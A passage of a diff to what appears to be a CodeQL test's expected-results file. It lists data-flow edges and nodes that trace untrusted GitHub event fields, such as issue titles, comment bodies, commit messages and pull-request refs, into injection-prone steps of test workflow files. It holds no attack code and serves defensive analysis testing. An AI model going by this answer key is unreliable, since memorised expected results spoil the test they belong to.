.github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | 
.github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses 
Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| 
.github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... 
tle }}' | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... 
laced}} | -| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... 
ame }}' | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | semmle.label | env.pr_message | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | 
semmle.label | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... 
iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... 
alue }} | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... 
tle }}' | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... 
ody }}' | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... 
age }}' | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... 
ame }}' | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | 
github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | 
github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| 
.github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... 
test }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... 